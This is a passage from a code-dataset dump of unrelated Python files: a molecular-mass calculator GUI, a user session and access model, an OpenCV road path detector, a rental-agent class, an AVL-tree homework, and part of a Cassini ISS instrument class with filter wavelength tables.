sFormula = formula\r\n\r\n # print(\"Original Formula: \", sFormula)\r\n\r\n # Search data inside()\r\n\r\n myRegEx = re.compile(r\"(\\()(\\w*)(\\))(\\d*)\", re.I)\r\n\r\n myMatches = myRegEx.findall(sFormula)\r\n\r\n while myMatches:\r\n myMatches = myRegEx.findall(sFormula)\r\n for match in myMatches:\r\n # print(match[1], match[3])\r\n count = match[3]\r\n text = \"\"\r\n if count == \"\":\r\n count = 1\r\n else:\r\n count = int(match[3])\r\n while count >= 1:\r\n text = text + match[1]\r\n count -= 1\r\n # print(text)\r\n sFormula = sFormula.replace('(' + match[1] + ')' + match[3], text)\r\n # print(\"Replaced formula: \", sFormula)\r\n\r\n myRegEx = re.compile(\"(C[laroudsemf]?|Os?|N[eaibdpos]?|S[icernbmg]?\"\r\n \"|P[drmtboau]?|H[eofgas]?|A[lrsgutcm]|B[eraik]?|Dy|E[urs]|F[erm]?|G\"\r\n \"[\"\"aed]|I[nr]?|Kr?|L[iaur]|M[gnodt]|R[buhenaf]|T[icebmalh]|U|V|W|Xe|Yb?|Z[nr])(\\d*)\")\r\n\r\n myMatches = myRegEx.findall(sFormula)\r\n\r\n molecularFormula = \"\"\r\n MW = 0\r\n text = \"\"\r\n\r\n for match in myMatches:\r\n # Search symbol\r\n symbol = match[0]\r\n atom_mass = find_atom(symbol)\r\n # Search numbers\r\n number = match[1]\r\n # print(atom_mass, number)\r\n if number == \"\":\r\n number = 1\r\n else:\r\n number = int(match[1])\r\n MW = MW + float(atom_mass) * number\r\n while number >= 1:\r\n molecularFormula = molecularFormula + symbol\r\n number -= 1\r\n # print(molecularFormula)\r\n # print(\"formula: \" + formula + \" MW = \" + str(MW))\r\n s = round(MW, 2)\r\n return s\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n def __init__(self):\r\n QMainWindow.__init__(self)\r\n\r\n # icon in window\r\n self.setWindowIcon(QIcon('atom.png'))\r\n # параметры робочого окна\r\n self.setMinimumSize(QSize(340, 300))\r\n self.setWindowTitle(\"Chemical Calculator\")\r\n # отображение полей ввода\r\n # enter formula line\r\n self.nameLabel = QLabel(self)\r\n self.nameLabel.setText('Enter formula')\r\n self.line = QLineEdit(self)\r\n\r\n # print label\r\n self.nameLabel_4 = QLabel(self)\r\n self.nameLabel_4.setText('Result')\r\n\r\n # параметры полей ввода\r\n # first atom line\r\n self.line.move(100, 20)\r\n self.line.resize(200, 32)\r\n self.nameLabel.move(20, 20)\r\n\r\n # print label\r\n\r\n self.nameLabel_4.move(20, 60)\r\n self.nameLabel_4.resize(200, 62)\r\n # метод нажатия на кнопку\r\n pushbutton = QPushButton('to count', self)\r\n pushbutton.clicked.connect(self.clickMethod)\r\n pushbutton.resize(200, 32)\r\n pushbutton.move(80, 250)\r\n\r\n def clickMethod(self,):\r\n # переменная с значением введеных атомов\r\n text1 = self.line.text()\r\n q = str(text1)\r\n b = moll_mass(q)\r\n self.nameLabel_4.setText('Result: ' + 'Formula: ' + str(q) + '\\n' +\r\n 'Molecular Mass: ' + str(q) + ' = ' + str(b) + ' g/mol')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n mainWin = MainWindow()\r\n mainWin.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"full_program_1.3.py","file_name":"full_program_1.3.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"578194934","text":"class AuthUserModel():\n '''\n Класс с данными пользователя\n '''\n # переменная с данными пользователя\n userData = None\n # переменная с данными сессии\n sessionData = None\n\n def __dict__(self):\n '''\n Магическая функция для перевода класса в Dict\n\n :rtype: dict\n :return:\n '''\n return {\n \"user\" : {\n \"surname\" : self.userData.surname,\n \"name\" : self.userData.name,\n \"secondname\" : self.userData.secondname,\n \"dateBirth\" : self.userData.dateBirth\n },\n \"token\" : self.sessionData.token,\n \"access\" : self.accessList(),\n \"phone\" : self.phoneList()\n }\n\n def phoneList(self):\n '''\n Фнукция выбирает все телефоны пользователя\n\n :rtype: list\n :return: res\n '''\n # массив для конечных результатов\n res = []\n from db2015 import linkUserPhone\n # ищем все телефоны пользователя\n linkListPhone = linkUserPhone.getDb(twistedServer.config.get(\"auth\",{}).get(\"dbUse\",\"\"))\\\n .query(linkUserPhone)\\\n .filter(linkUserPhone.codeUser == self.userData.code)\\\n .all()\n # перебираем ��елефоны\n for linkPhone in linkListPhone:\n # добавляем телефон в результирующий массив\n res.append({\n \"phone\" : \"+7\"+linkPhone.phone.numberCode+linkPhone.phone.numberBody,\n \"type\" : linkPhone.phone.codeType\n })\n # возвращаем результат\n return res\n\n def accessList(self):\n '''\n Функция возвращает список кодов доступа пользователя\n\n :rtype: list\n :return: ret\n '''\n from db2015 import linkUserAccessView\n # получаем все коды доступа пользователя\n result = linkUserAccessView.getDb(twistedServer.config.get(\"auth\",{}).get(\"dbUse\",\"\"))\\\n .query(linkUserAccessView.codeAccess)\\\n .filter(linkUserAccessView.codeUser == self.userData.code)\\\n .all()\n # переменная для результата\n ret = []\n # переводим двумерный массив в одномерный\n for item in result:\n ret.append(item[0])\n # возвращаем список кодов доступа\n return ret\n\n def isAccess(self, code=None):\n '''\n Функция для проверки кода доступа у пользователя\n\n :type code: str | list\n :param code: Код доступа для проверки\n\n :rtype: bool\n :return: True - при успехе, иначе False\n '''\n # переменная для конечного значения\n access = False\n # определяем тип кода (строка или массив строк)\n if isinstance(code, list):\n # если массив строк\n for itemCode in code:\n # смотим есть ли код доступа в списке кодов доступа пользователя\n if itemCode in self.accessList():\n # если есть, access проставляем в True\n access = True\n elif isinstance(code, str):\n # если строка\n # смотим есть ли код доступа в списке кодов доступа пользователя\n if code in self.accessList():\n # если есть, access проставляем в True\n access = True\n # возвращаем access\n return access\n\n def sessionExtension(self):\n '''\n Функция для продление сессии пользователя\n\n :rtype: bool\n :return: True - если сессия продленна, False - если крах\n '''\n from datetime import datetime, timedelta\n # продляем действие сессии\n self.sessionData.dateStop = (datetime.now() + timedelta(seconds=twistedServer.config.get(\"auth\",{}).get(\"sessionLifeTime\", 60)))\\\n .timestamp()\n # сохраняем новую конечную дату\n if not self.sessionData.save():\n # если произошла ошибка, то возвращаем False\n return False\n return True\n\n def sessionStop(self):\n '''\n Функция для остановки сессии пользователя\n\n :rtype: bool\n :return: True - если сессия остановленна, False - если крах\n '''\n # ставим флаг, для обазначения остановки сессии\n self.sessionData.disable = True\n # сохраняем изминений\n if not self.sessionData.save():\n # если ошибка, возвращаем False\n return False\n # если все гуд и сессия остановлена, True\n return True","sub_path":"server/modules/authorization/authUserModel.py","file_name":"authUserModel.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"325760841","text":"import logging\nimport numpy as np\nimport cv2\n\nfrom scipy import ndimage\nfrom math import sin, cos, pi\n\nlogging.info('Path detector 1.0 has been initialized')\n\n\ndef detect(mask):\n\n img_height, img_width = mask.shape\n car_center = (img_width // 2, img_height)\n path_img = np.zeros((img_height, img_width, 3), np.uint8)\n cv2.circle(path_img, car_center, 4, (0, 0, 252), -1)\n\n # recherche des directions possible et les met dans path_dict:\n # la partie importante du code se trouve dans la fonction find_directions()\n path_dict, path_img = find_directions(mask, path_img, car_center)\n max_left, max_right = find_min_max(mask, path_img, car_center)\n for key in path_dict.keys():\n angle = path_dict[key]\n if angle is not None:\n if angle < max_right:\n path_dict[key] = max_right\n elif angle > max_left:\n path_dict[key] = max_left\n path_dict[\"max_right\"] = max_right\n path_dict[\"max_left\"] = max_left\n return (path_dict, path_img)\n\n\ndef find_directions(mask, path_img, car_center):\n \"\"\"renvoie un dictionnaire avec des listes des directions possibles\n triees en 3 directions principales: gauche, tout droit et droite\"\"\"\n last = False\n img_height, img_width = mask.shape\n path_dict = {'left': None, 'straight': None, 'right': None}\n currentDirection = []\n center = img_width//2, int(img_height*0.7)\n r = img_height*0.25\n # la boucle for recherche les chemins libres dans chaque direction\n angle = -10\n while angle < 190:\n p = int(center[0]+r*cos(angle*pi/180)), int(center[1]-r*sin(angle*pi/180))\n # verifie si le chemin dans la direction de p est libre\n edge = find_edge(mask, center, p)\n if edge[1] == 100:\n # si le chemin est libre, on ajoute le point dans la liste currentDirection\n if not last:\n currentDirection = [(edge[0], angle)]\n else:\n currentDirection.append((edge[0], angle))\n last = True\n else:\n if last:\n # on passe d'une ligne libre a une ligne non-libre\n # donc c'est la fin de la liste currentDirection\n # donc on prend le milieu de currentDirection comme direction moyenne\n middle = currentDirection[len(currentDirection)//2]\n midle_angle = middle[1]\n direction = \"straight\"\n if midle_angle > 130:\n direction = \"left\"\n elif midle_angle < 50:\n direction = \"right\"\n cv2.circle(path_img, middle[0], 4, (0, 0, 255), -1)\n # on ajoute l'angle correspondant a cette direction dans le dictionnaire\n # utilise la fonction regularize() pour que l'angle ne soit pas dirige vers l'exterieur de la route\n path_dict[direction] = model_to_heading(middle[0], car_center)\n last = False\n\n cv2.circle(path_img, edge[0], 4, (0, 255, 0), -1)\n cv2.line(path_img, center, p, (255, 0, 0))\n angle += 5\n return (path_dict, path_img)\n\n\ndef find_min_max(mask, path_img, car_center):\n img_height, img_width = mask.shape\n right_edge = (0, 0)\n left_edge = (0, 0)\n r = img_height*0.25\n center = car_center\n lst = []\n angle = 45\n while angle < 135:\n origin = p = int(center[0]+r*cos(angle*pi/180)*0.6), int(center[1]-r*sin(angle*pi/180)*0.6)\n p = int(center[0]+r*cos(angle*pi/180)), int(center[1]-r*sin(angle*pi/180))\n # verifie si le chemin dans la direction de p est libre\n edge = find_edge(mask, origin, p)\n if edge[1] == 100:\n lst.append(edge[0])\n cv2.line(path_img, origin, p, (255, 0, 0))\n angle += 5\n if len(lst) > 1:\n right_edge = lst[1]\n left_edge = lst[-1]\n else:\n right_edge = left_edge = img_width//2, 0\n cv2.circle(path_img, right_edge, 4, (0, 255, 0), -1)\n cv2.circle(path_img, left_edge, 4, (0, 255, 0), -1)\n return model_to_heading(left_edge, car_center), model_to_heading(right_edge, car_center)\n\n\ndef find_edge(mask, p0, p1):\n \"\"\"trouve le bord de la route dans la direction p0->p1, renvoie un tuple avec le point et sa distance (de 0 100)\"\"\"\n x_tab, y_tab, line_tab = profile(mask, p0, p1, 100)\n non_zero = np.nonzero(line_tab)[0]\n found = True\n while non_zero.size > 4:\n n = non_zero[0]\n found = True\n for i in range(1, 4):\n if not non_zero[i] in range(n, n+7) and found:\n non_zero = np.delete(non_zero, 0)\n found = False\n if found:\n return [(int(x_tab[n]), int(y_tab[n])), n]\n if non_zero.size != 0 and found:\n n = non_zero[0]\n return [(int(x_tab[n]), int(y_tab[n])), n]\n\n return [p1, 100]\n\n\ndef model_to_heading(model_xy, car_center_xy):\n \"\"\"Calculate the angle (in degrees) between the vertical line that\n passes through the point `car_center_xy` and the line that connects\n `car_center_xy` with `model_xy`.\n A negative angle means that the car should turn clockwise; a positive\n angle that the car should move counter-clockwise.\"\"\"\n dx = 1. * model_xy[0] - car_center_xy[0]\n dy = 1. * model_xy[1] - car_center_xy[1]\n heading = -np.arctan2(dx, -dy)*180/np.pi\n return heading\n\n\ndef profile(mask, p0, p1, num):\n \"\"\"Takes `num` equi-distance samples on the straight line between point `p0`\n and point `p2` on binary image `mask`.\n\n Here, points p0 and p1 are 2D points (x-coord,y-coord)\n\n Returns: a triple (n, m, vals) where:\n - n is a numpy array of size `num` containing the x-coordinates of\n sampled points\n - m is a numpy array of size `num` containing the y-coordinates of\n sampled points\n - vals is a numpy array of size `num` containing the sampled point\n values, i.e. vals[i] = mask[m[i], n[i]]\n (recall that images are indexed first on y-coordinate, then on\n x-coordinate)\n \"\"\"\n n = np.linspace(p0[0], p1[0], num)\n m = np.linspace(p0[1], p1[1], num)\n return [n, m, ndimage.map_coordinates(mask, [m, n], order=0)]\n","sub_path":"Orange Pi/path_detector.py","file_name":"path_detector.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"513651847","text":"from chapter3_case_study.HouseRental import HousePurchase, AppartmentRental, AppartmentPurchase, HouseRental\nfrom chapter3_case_study.helper_functions import get_valid_input\n\n\nclass Agent:\n def __init__(self):\n self.property_list = []\n self.type_map = {\n (\"house\",\"rental\"): HouseRental,\n (\"house\",\"purchase\"): HousePurchase,\n (\"appartment\",\"rental\"): AppartmentRental,\n (\"appartment\",\"purchase\"): AppartmentPurchase\n }\n\n def add_property(self):\n property_type = get_valid_input(\"What type of property? \",\n (\"house\",\"appartment\")).lower()\n payment_type = get_valid_input(\"What payment type? \",\n (\"purchase\",\"rental\")).lower()\n\n PropertyClass = self.type_map[(property_type, payment_type)]\n init_args = PropertyClass.prompt_init()\n self.property_list.append(PropertyClass(**init_args))\n\n def display_properties(self):\n for property in self.property_list:\n property.display()","sub_path":"chapter3_case_study/Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"459748514","text":"# 27.Print all even numbers in range\n# a\nn = int(input(\"Enter range:\"))\nfor i in range(n+1):\n if i % 2 == 0:\n print(i)\n\n# b\ni = 0\nn=10\nwhile i <= n:\n if i % 2 == 0:\n print(i)\n i += 1","sub_path":"27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"118025032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 6 15:23:16 2021\n\n@author: Madeline Edmonds\nCPSC 330 Homework 4\n\nLast Edited: Friday Oct 15 2021\n\"\"\"\n\n# =============================================================================\n# Import random library for number generation\n# =============================================================================\nimport random\n\nclass TreeNode:\n def __init__(self, value):\n self.value = value\n self.left_child = None\n self.right_child = None\n# =============================================================================\n# Counting the height\n# =============================================================================\n self.height = 1\n\nclass AVLTree:\n def __init__(self):\n self.size = 0\n# =============================================================================\n# Count the number of left and right rotations\n# =============================================================================\n self.numLeft = 1\n self.numRight = 1\n \n\n def num_nodes(self):\n return self.size\n \n def put(self, root, key):\n if not root:\n return TreeNode(key)\n elif key < root.value:\n root.left_child = self.put(root.left_child, key)\n else:\n root.right_child = self.put(root.right_child, key)\n \n self.size = self.size + 1\n root.height = 1+ max(self.getHeight(root.left_child), \n self.getHeight(root.right_child))\n\n# =============================================================================\n# Update the balanceFactor \n# =============================================================================\n balanceFactor = self.updateBalance(root)\n \n if balanceFactor > 1 and key < root.left_child.value:\n return self.rotateRight(root)\n \n elif balanceFactor < -1 and key > root.right_child.value:\n return self.rotateLeft(root)\n \n elif balanceFactor > 1 and key > root.left_child.value:\n root.left_child = self.rotateLeft(root.left_child)\n return self.rotateRight(root)\n \n elif balanceFactor < -1 and key < root.right_child.value:\n root.right_child = self.rotateRight(root.right_child)\n return self.rotateLeft(root)\n \n return root\n# =============================================================================\n# Left Rotation \n# =============================================================================\n def rotateLeft(self,rotRoot):\n \n self.numLeft +=1\n\n newRoot = rotRoot.right_child\n temp = newRoot.left_child\n \n newRoot.left_child = rotRoot\n rotRoot.right_child = temp\n rotRoot.height = 1 + max(self.getHeight(rotRoot.left_child),\n self.getHeight(rotRoot.right_child))\n newRoot.height = 1 + max(self.getHeight(newRoot.left_child),\n self.getHeight(newRoot.right_child))\n \n return newRoot\n\n# =============================================================================\n# Right Rotation \n# =============================================================================\n def rotateRight(self,rotRoot):\n self.numRight = self.numRight + 1\n \n newRoot = rotRoot.left_child\n t2 = newRoot.right_child \n \n newRoot.right_child = rotRoot\n rotRoot.left_child = t2\n\n rotRoot.height = 1 + max(self.getHeight(rotRoot.left_child),\n self.getHeight(rotRoot.right_child))\n newRoot.height = 1 + max(self.getHeight(newRoot.left_child),\n self.getHeight(newRoot.right_child))\n \n return newRoot\n \n# =============================================================================\n# Get the Height and Balance \n# =============================================================================\n \n def getHeight(self, root):\n if not root:\n return 0\n return root.height\n \n def updateBalance(self, root):\n if not root:\n return 0\n return self.getHeight(root.left_child) - self.getHeight(root.right_child)\n# =============================================================================\n# Take the total of left rotations and the total number of right \n# rotations and add them together \n# =============================================================================\n def numRotate(self,root):\n if not root:\n return 0\n return self.numLeft + self.numRight\n\n\n\navl2 = AVLTree()\n\navlList = random.sample(range(1,10001), 1000)#Generate a radom unique array of 1000 numbers\n# =============================================================================\n# Add the numbers to the list\n# =============================================================================\nroot2 = None\n\nfor i in range(1000):\n root2 = avl2.put(root2, avlList[i])\n\n\n# =============================================================================\n# print(avlList) WILL SHOW ALL NUMBERS IN THE LIST\n# =============================================================================\n\nprint(\"Rotations:\",avl2.numRotate(root2))\nprint(\"Height of Tree:\", avl2.getHeight(root2))","sub_path":"MEdmonds_CPSC330_Homework4.py","file_name":"MEdmonds_CPSC330_Homework4.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"605696120","text":"################################################################################\n# obs_instrument_coiss.py\n#\n# Defines the ObsInstrumentCOISS class, which encapsulates fields in the\n# common, obs_mission_cassini, and obs_instrument_coiss tables for\n# COISS_[12]xxx.\n################################################################################\n\nimport opus_support\n\nfrom obs_mission_cassini import (ObsMissionCassini,\n COISS_TARGET_DESC_MAPPING)\n\n\n# Wavelength information for combinations of filters\n# This data is from the ISS Data User's Guide Table A.2\n# When missing from there it is from the CISSCAL files na_effwl.tab\n# and wa_effwl.tab\n# (Camera, Filter1, Filter2): (Central wavelength, FWHM, Effective wavelength)\n# Values are in nm and must be converted to microns!\n_COISS_FILTER_WAVELENGTHS = {\n ('N', 'CL1', 'CL2'): (610.675, 340.056, 651.057),\n ('N', 'CL1', 'GRN'): (568.134, 113.019, 569.236),\n ('N', 'CL1', 'UV3'): (338.284, 68.0616, 343.136),\n ('N', 'CL1', 'BL2'): (439.923, 29.4692, 440.980),\n ('N', 'CL1', 'MT2'): (727.421, 4.11240, 727.415),\n ('N', 'CL1', 'CB2'): (750.505, 10.0129, 750.495),\n ('N', 'CL1', 'MT3'): (889.194, 10.4720, 889.196),\n ('N', 'CL1', 'CB3'): (937.964, 9.54761, 937.928),\n ('N', 'CL1', 'MT1'): (618.945, 3.68940, 618.949),\n ('N', 'CL1', 'CB1'): (619.381, 9.99526, 619.292),\n ('N', 'CL1', 'CB1A'): (602.908, 9.99526, 602.917),\n ('N', 'CL1', 'CB1B'): (634.531, 11.9658, 634.526),\n ('N', 'CL1', 'IR3'): (929.763, 66.9995, 928.304),\n ('N', 'CL1', 'IR1'): (751.894, 152.929, 750.048),\n ('N', 'RED', 'CL2'): (650.086, 149.998, 648.879),\n ('N', 'RED', 'GRN'): (601.032, 51.9801, 600.959),\n ('N', 'RED', 'MT2'): (726.633, 2.33906, 726.624),\n ('N', 'RED', 'CB2'): (744.255, 4.22393, 743.912),\n ('N', 'RED', 'MT1'): (618.911, 3.69858, 618.922),\n ('N', 'RED', 'CB1'): (619.568, 9.07488, 619.481),\n ('N', 'RED', 'IR3'): (695.435, 2.04887, 695.040),\n ('N', 'RED', 'IR1'): (701.900, 44.9603, 701.692),\n ('N', 'BL1', 'CL2'): (450.851, 102.996, 455.471),\n ('N', 'BL1', 'GRN'): (497.445, 5.00811, 497.435),\n ('N', 'BL1', 'UV3'): (386.571, 14.0295, 389.220),\n ('N', 'BL1', 'BL2'): (440.035, 29.6733, 441.077),\n ('N', 'UV2', 'CL2'): (297.880, 59.9535, 306.477),\n ('N', 'UV2', 'UV3'): (315.623, 28.9282, 317.609),\n ('N', 'UV1', 'CL2'): (258.098, 37.9542, 266.321),\n ('N', 'UV1', 'UV3'): (350.697, 9.07263, 353.878),\n ('N', 'IRPO', 'MT2'): (727.434, 4.11241, 727.424),\n ('N', 'IRPO', 'CB2'): (750.512, 10.0158, 750.501),\n ('N', 'IRPO', 'MT3'): (889.211, 10.4738, 889.208),\n ('N', 'IRPO', 'CB3'): (938.001, 9.54946, 937.961),\n ('N', 'IRPO', 'MT1'): (618.970, 3.69682, 618.967),\n ('N', 'IRPO', 'IR3'): (930.047, 67.9802, 928.583),\n ('N', 'IRPO', 'IR1'): (752.822, 153.994, 750.967),\n ('N', 'P120', 'GRN'): (568.532, 112.946, 569.630),\n ('N', 'P120', 'UV3'): (341.101, 66.0391, 345.492),\n ('N', 'P120', 'BL2'): (440.022, 29.4620, 441.079),\n ('N', 'P120', 'MT2'): (727.430, 4.11216, 727.421),\n ('N', 'P120', 'CB2'): (750.535, 10.0307, 750.524),\n ('N', 'P120', 'MT1'): (618.908, 3.69299, 618.920),\n ('N', 'P120', 'CB1'): (619.961, 9.99561, 619.872),\n ('N', 'P60', 'GRN'): (568.532, 112.946, 569.630),\n ('N', 'P60', 'UV3'): (341.101, 66.0391, 345.492),\n ('N', 'P60', 'BL2'): (440.022, 29.4620, 441.079),\n ('N', 'P60', 'MT2'): (727.430, 4.11216, 727.421),\n ('N', 'P60', 'CB2'): (750.535, 10.0307, 750.524),\n ('N', 'P60', 'MT1'): (618.908, 3.69299, 618.920),\n ('N', 'P60', 'CB1'): (619.961, 9.99561, 619.872),\n ('N', 'P0', 'GRN'): (568.532, 112.946, 569.630),\n ('N', 'P0', 'UV3'): (341.101, 66.0391, 345.492),\n ('N', 'P0', 'BL2'): (440.022, 29.4620, 441.079),\n ('N', 'P0', 'MT2'): (727.430, 4.11216, 727.421),\n ('N', 'P0', 'CB2'): (750.535, 10.0307, 750.524),\n ('N', 'P0', 'MT1'): (618.908, 3.69299, 618.920),\n ('N', 'P0', 'CB1'): (619.961, 9.99561, 619.872),\n ('N', 'HAL', 'CL2'): (655.663, 9.26470, 655.621),\n ('N', 'HAL', 'GRN'): (648.028, 5.58862, 647.808),\n ('N', 'HAL', 'CB1'): (650.567, 2.73589, 650.466),\n ('N', 'HAL', 'IR1'): (663.476, 5.25757, 663.431),\n ('N', 'IR4', 'CL2'): (1002.40, 35.9966, 1001.91),\n ('N', 'IR4', 'IR3'): (996.723, 36.0700, 996.460),\n ('N', 'IR2', 'CL2'): (861.962, 97.0431, 861.066),\n ('N', 'IR2', 'MT3'): (889.176, 10.4655, 889.176),\n ('N', 'IR2', 'CB3'): (933.657, 3.71709, 933.593),\n ('N', 'IR2', 'IR3'): (901.843, 44.0356, 901.630),\n ('N', 'IR2', 'IR1'): (827.438, 28.0430, 827.331),\n ('W', 'CL1', 'CL2'): (634.928, 285.999, 633.817),\n ('W', 'CL1', 'RED'): (648.422, 150.025, 647.239),\n ('W', 'CL1', 'GRN'): (567.126, 123.999, 568.214),\n ('W', 'CL1', 'BL1'): (460.418, 62.2554, 462.865),\n ('W', 'CL1', 'VIO'): (419.684, 18.1825, 419.822),\n ('W', 'CL1', 'HAL'): (656.401, 9.96150, 656.386),\n ('W', 'CL1', 'IR1'): (741.456, 99.9735, 739.826),\n ('W', 'IR3', 'CL2'): (917.841, 45.3074, 916.727),\n ('W', 'IR3', 'RED'): (690.604, 3.04414, 689.959),\n ('W', 'IR3', 'IRP90'): (917.883, 45.3223, 916.770),\n ('W', 'IR3', 'IRP0'): (917.883, 45.3223, 916.770),\n ('W', 'IR3', 'IR1'): (790.007, 3.02556, 783.722),\n ('W', 'IR4', 'CL2'): (1002.36, 25.5330, 1001.88),\n ('W', 'IR4', 'IRP90'): (1002.44, 25.5299, 1001.98),\n ('W', 'IR4', 'IRP0'): (1002.44, 25.5299, 1001.98),\n ('W', 'IR5', 'CL2'): (1034.49, 19.4577, 1033.87),\n ('W', 'IR5', 'IRP90'): (1035.20, 19.4591, 1034.85),\n ('W', 'IR5', 'IRP0'): (1035.20, 19.4591, 1034.85),\n ('W', 'CB3', 'CL2'): (938.532, 9.95298, 938.445),\n ('W', 'CB3', 'IRP90'): (938.668, 9.95308, 938.611),\n ('W', 'CB3', 'IRP0'): (938.668, 9.95308, 938.611),\n ('W', 'MT3', 'CL2'): (890.340, 10.0116, 890.332),\n ('W', 'MT3', 'IRP90'): (890.368, 10.0118, 890.364),\n ('W', 'MT3', 'IRP0'): (890.368, 10.0118, 890.364),\n ('W', 'CB2', 'CL2'): (752.364, 10.0044, 752.354),\n ('W', 'CB2', 'RED'): (747.602, 4.07656, 747.317),\n ('W', 'CB2', 'IRP90'): (752.373, 10.0049, 752.363),\n ('W', 'CB2', 'IRP0'): (752.373, 10.0049, 752.363),\n ('W', 'CB2', 'IR1'): (752.324, 10.0026, 752.314),\n ('W', 'MT2', 'CL2'): (728.452, 4.00903, 728.418),\n ('W', 'MT2', 'RED'): (727.517, 2.05059, 727.507),\n ('W', 'MT2', 'IRP90'): (728.470, 4.00906, 728.435),\n ('W', 'MT2', 'IRP0'): (728.470, 4.00906, 728.435),\n ('W', 'MT2', 'IR1'): (728.293, 4.00906, 728.284),\n ('W', 'IR2', 'CL2'): (853.258, 54.8544, 852.448),\n ('W', 'IR2', 'IRP90'): (853.320, 54.8765, 852.510),\n ('W', 'IR2', 'IRP0'): (853.320, 54.8765, 852.510),\n ('W', 'IR2', 'IR1'): (826.348, 26.0795, 826.255),\n}\n# The following filter combinations are found in the data (through COISS_2111)\n# but aren't in the above table.\n# If one of the filters is a polarizer, we substitute it with CLEAR and see if\n# that works. Note that this isn't really a great choice - IRP especially has\n# a fairly narrow pass band. If this doesn't work or neither of the filters is\n# a polarizer, we just set the result to NULL. These combinations are often\n# silly anyway. Who wants IR2+UV3?\n# N/HAL/UV3\n# N/IR2/UV3\n# N/IR4/UV3\n# N/IRP0/CB1\n# N/IRP0/CB2\n# N/IRP0/CB3\n# N/IRP0/CL2\n# N/IRP0/GRN\n# N/IRP0/IR1\n# N/IRP0/IR3\n# N/IRP0/MT1\n# N/IRP0/MT2\n# N/IRP0/MT3\n# N/P0/CL2\n# N/P0/IR1\n# N/P0/IR3\n# N/P120/CL2\n# N/P120/IR1\n# N/P60/CL2\n# N/P60/IR1\n# N/RED/UV3\n# N/UV1/BL2\n# N/UV1/CB1\n# N/UV1/CB2\n# N/UV1/GRN\n# N/UV1/IR1\n# N/UV1/IR3\n# N/UV2/BL2\n# N/UV2/CB1\n# N/UV2/CB2\n# N/UV2/GRN\n# N/UV2/IR1\n# N/UV2/IR3\n# N/UV2/MT1\n# W/CB3/HAL\n# W/CB3/VIO\n# W/CL1/IRP0\n# W/CL1/IRP90\n# W/IR3/BL1\n# W/MT3/BL1\n\n\nclass ObsInstrumentCOISS(ObsMissionCassini):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n #############################\n ### OVERRIDE FROM ObsBase ###\n #############################\n\n @property\n def instrument_id(self):\n return 'COISS'\n\n def convert_filespec_from_lbl(self, filespec):\n return filespec.replace('.LBL', '.IMG')\n\n\n ################################\n ### OVERRIDE FROM ObsGeneral ###\n ################################\n\n def field_obs_general_observation_duration(self):\n return self._index_col('EXPOSURE_DURATION') / 1000\n\n # We occasionally don't bother to generate ring_geo data for COISS, like during\n # cruise, so just use the given RA/DEC from the index if needed. We don't make\n # any effort to figure out the min/max values.\n def field_obs_general_right_asc1(self):\n ra = self._ring_geo_index_col('MINIMUM_RIGHT_ASCENSION')\n if ra is not None:\n return ra\n return self._index_col('RIGHT_ASCENSION')\n\n def field_obs_general_right_asc2(self):\n ra = self._ring_geo_index_col('MAXIMUM_RIGHT_ASCENSION')\n if ra is not None:\n return ra\n return self._index_col('RIGHT_ASCENSION')\n\n def field_obs_general_declination1(self):\n ra = self._ring_geo_index_col('MINIMUM_DECLINATION')\n if ra is not None:\n return ra\n return self._index_col('DECLINATION')\n\n def field_obs_general_declination2(self):\n ra = self._ring_geo_index_col('MAXIMUM_DECLINATION')\n if ra is not None:\n return ra\n return self._index_col('DECLINATION')\n\n def field_obs_general_ring_obs_id(self):\n camera = self._index_col('INSTRUMENT_ID')[3]\n assert camera in ('N', 'W')\n filename = self._index_col('FILE_NAME')\n image_num = filename[1:11]\n planet = self._cassini_planet_id()\n if planet is None:\n pl_str = ''\n else:\n pl_str = planet[0]\n return f'{pl_str}_IMG_CO_ISS_{image_num}_{camera}'\n\n def field_obs_general_planet_id(self):\n return self._create_mult(self._cassini_planet_id())\n\n def _target_name(self):\n return [self._cassini_intended_target_name()]\n\n def field_obs_general_quantity(self):\n filter1, filter2 = self._index_col('FILTER_NAME')\n if filter1.startswith('UV') or filter2.startswith('UV'):\n return self._create_mult('EMISSION')\n return self._create_mult('REFLECT')\n\n def field_obs_general_observation_type(self):\n return self._create_mult('IMG') # Image\n\n\n ############################\n ### OVERRIDE FROM ObsPds ###\n ############################\n\n def field_obs_pds_note(self):\n return self._index_col('DESCRIPTION')\n\n\n ##################################\n ### OVERRIDE FROM ObsTypeImage ###\n ##################################\n\n def field_obs_type_image_image_type_id(self):\n return self._create_mult('FRAM')\n\n def field_obs_type_image_duration(self):\n return self.field_obs_general_observation_duration()\n\n def field_obs_type_image_levels(self):\n return 4096\n\n def field_obs_type_image_greater_pixel_size(self):\n # For COISS, this is both greater and lesser pixel size\n inst_mode = self._index_col('INSTRUMENT_MODE_ID')\n if inst_mode == 'FULL':\n return 1024\n if inst_mode == 'SUM2':\n return 512\n if inst_mode == 'SUM4':\n return 256\n self._log_nonrepeating_error(f'Unknown INSTRUMENT_MODE_ID \"{inst_mode}\"')\n return None\n\n def field_obs_type_image_lesser_pixel_size(self):\n return self.field_obs_type_image_greater_pixel_size()\n\n\n ###################################\n ### OVERRIDE FROM ObsWavelength ###\n ###################################\n\n # See additional notes under _COISS_FILTER_WAVELENGTHS\n def _coiss_wavelength_helper(self, camera, filter1, filter2):\n key = (camera, filter1, filter2)\n if key in _COISS_FILTER_WAVELENGTHS:\n return 